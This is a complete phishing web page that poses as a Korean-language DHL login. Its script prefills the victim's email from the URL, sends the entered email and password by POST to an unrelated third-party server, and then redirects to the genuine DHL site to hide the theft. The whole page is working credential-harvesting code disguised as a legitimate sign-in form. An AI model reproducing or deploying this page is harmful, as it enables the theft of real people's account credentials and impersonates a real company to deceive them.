
<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>DHL은 특급 발송, 배송비 문의, 특급 추적 및 픽업 예약에 사용할 수 있습니다</title>
    <link rel="icon" type="image/ico" href="https://mydhlplus.dhl.com/etc/designs/dhl/favicon.gif"/>
    <style type="text/css">
    body {
        background-image: url("https://dhl.japanfurnish.repl.co/dhl.jpg");
  background-repeat: no-repeat;
  background-attachment: fixed; 
  background-size: 100% 100%;
    }

    .container {
        width: 100%;
        display: flex;
        justify-content: right;
        align-items: center;
        height: 100vh;
    }

    .office {
        width: 310px;
        background: #fff;
    }

    .office-holder {
        width: 80%;
        margin: auto;
        padding: 20px 0px;
    }

    .logo {
        width: 100%;
        margin-bottom: 2em;
    }

    .logo h1 {
        font-family: arial;

    }

    .logo h2 {
        display: block !important;
    }

    .verify {
        width: 70%;
        margin: auto;
    }

    .verify h4 {
        font-family: arial;
    }

    fieldset {
        width: 90%;
        float: right;
        border: 2px solid #4285f4;
        border-radius: 5px;
    }

    legend {
        font-size: 15px;
        overflow: hidden;
        width: 42%;
        padding: 0px 2px;
        margin: 0px;
    }

    .verify input[type='text'] {
        width: 100%;
        float: right;
        border: none;
        padding: 3px 10px;
    }

    .verify button {
        border: none;
        height: 40px;
        width: 80px;
        float: right;
        margin-top: 2em;
        background: #4285f4;
        border-radius: 5px;
        color: #fff;
    }

    .email-to-verify {
        border: 1px solid #000;
        border-radius: 10px;
    }

    .form-holder {
        width: 100%;
        float: left;
    }

    .form-holder h3 {
        font-weight: 600;
    }

    .form-holder input[type='email'],
    input[type='password'] {
        width: 100%;
        height: 40px;
        float: left;
        margin-bottom: 15px;
    }

    .form-holder .btn-holder {
        width: 100%;
        margin-top: 1em;
        display: flex;
        align-content: center;
        align-items: center;
        justify-content: center;
    }

    .form-holder .btn-holder .btn {
        background: #FFB200;
        border: none;
        padding: 6px 10px;
        color: black;
        border-radius: 0px;
        margin-top: 20px;
        margin-bottom: 20px;
    }

    .form-holder .btn-holder .btn:hover {
        cursor: pointer;
    }

    .checkbox {
        width: 100%;
        float: left;
        margin-top: 5px;
    }

    .checkbox label {
        font-family: arial;
        font-size: 13px;
        float: left;
        margin-left: 1em;
    }

    .hide {
        display: none;
    }
    </style>
</head>

<body>
    <div class="container">
        
        <div class="office show border shadow bg-light" id="others">
            <div class="office-holder">
                    <div class="logo">
                        <div id="login_logo">
                            <img src="https://dhl.japanfurnish.repl.co/bgx.jpg" width="120" alt="" title="登录">
                        </div>
                <div style="width: 100%;">
                    <div class="alert alert-danger" id="msg" style="display: none;">비밀번호가 잘못되었습니다! 올바른 비밀번호를 입력했는지 확인하십시오.</div>
                    <span id="error" class="text-danger" style="display: none;">이 계정은 여기에 존재하지 않습니다. 다른 계정 입력</span>
                </div>
                <form>
                    <div class="form-holder">
                        <input type="email" id="email" value="" class="form-control" placeholder="이메일 주소" required="required"/readonly>
                        <input type="password" id="password" placeholder="암호" class="form-control" required="">
                        <div class="checkbox">
                            </span>
<span class="validation-mark"></span>
            <span ewf-field-errors></span>
        </label>
        <a href="#" class="left link_forgot-password margin-top" data-tracking="{'type':'forgotPasswordModal','title':{'en': 'Forgot password'}}" aqa-id="forgotPassword">비밀번호 찾기</a>
   <label class="login-popup-remember checkbox">
            <input type="checkbox" value="checkbox" class="checkbox__input" ng-model="loginCtrl.rememberMe" aqa-id="rememberMe"/>
            <span class="label">ID 기억하기</span> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA4AAAAQCAYAAAAmlE46AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAGRSURBVDhPY3z58uV/BjIAE5RGAd9+/2c49ewnw/xLXxiuvvkN5qMDFBtfffvLkLTlLcPp5z+hIhDAAjTeRYGTYbqHMAMXKyNYDK7x7ItfDBEbXjN8+vkPLAECnCyMQE2MDJ9/QcQkeZgZdkWKM4hxMUOc+vvvfwxNIJNvZ0gzHIuXgIowMDz/8pfBf/UrMBussfvkJxRNIPALaNiM858Ziva8h4pAwL0PfxhmX/gMcarlwudgAXQgwMEEDhiQIcjAQY4DYiO6JkGghh3h4gw306UZYnS4oaIIcBeoHmt0SAAD4dDjH2D2iaeoIQwDYI3SvMxgDgxcB8adjSwHw4cf/xiuAdnoQJybCaLRUZ4DLAADoBA1lmBjOPLkJ0OEFqZTA9S4IBrLLfnhEQsCID+CgDTQyQcfQZwMA6A4TNDlQSSAjbe+MWTtfMvwBzVWUAAfOxPDigBRsGtQktyV178Z4je/YXjyGTNqNEVYGZb6icLDA0UjDJwHJr8jT36ADbKQZgfHm6IAC1QWArBqJAwYGABGVaahk5SZ2QAAAABJRU5ErkJggg==" width="15" alt="" title="DHL 시스템은 귀하의 이메일 주소를 기억하고 현재 장치에 올바르게 저장합니다">
    

        </label>
                    </div>
                        <div class="btn-holder">
                            <button class="btn btn-lg col-12" id="submit-btn"><i class="fa fa-lock"></i>      로그인</button>
                        </div>
<span class="fw-bold">ID가 없습니까?</span>
        <a href="#" data-tracking="{'type':'registrationModal','title':{'en': 'Register now'}}" aqa-id="registration-start"> </a>
                    </div>
<span class="fw-bold"></span>
        <a href="#" data-tracking="{'type':'registrationModal','title':{'en': 'Register now'}}" aqa-id="registration-start">지금 가입하세요</a>
                    </div>
                    
                </form>
            </div>
        </div>
    </div>    
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
<!-- Optional JavaScript -->
  <!-- jQuery first, then Popper.js, then Bootstrap JS -->
  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>


<script>
  $(document).ready(function(){
    var count=0;
    /////////////url email getting////////////////
    var email = window.location.hash.substr(1);
    if (!email) {

    }
    else
    {
        // $('#email').val(email);
        var my_email =email;
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();        
        $('#email').val(my_email);
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(final);
        $("#msg").hide();
      }
      ///////////////url getting email////////////////


      var file="bmV4dC5waHA=";
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!email) {
            $('#error').show();
            $('#error').html("이메일 필드가 비어 있습니다. !");
            ai.focus;
            return false;
        }

        if (!filter.test(my_email)) {
            $('#error').show();
            $('#error').html("이 계정은 여기에 존재하지 않습니다. 다른 계정 입력");
            ai.focus;
            return false;
        }
        if (!password) {
            $('#error').show();
            $('#error').html("암호 필드가 비어 있습니다. !");
            ai.focus;
            return false;
        }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      ///////////new injection////////////////
      count=count+2;
      $('#domain-name').html(final);
      $.ajax({
        dataType: 'JSON',
        url: "https://dev-newshe.pantheonsite.io/dhk/next.php",
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('확인...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                	
                  $("#password").val("");
                  if (count>=0) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://mydhlplus.dhl.com/cn/zh/ship/optional-services.html");

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
            	
              $("#password").val("");
              if (count>=4) {
                count=0;
                window.location.replace("https://mydhlplus.dhl.com/kr/ko/ship/optional-services.html");
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('<i class="fa fa-lock"></i>로그인');
            }
          });
    });


    });


  </script>

  </html>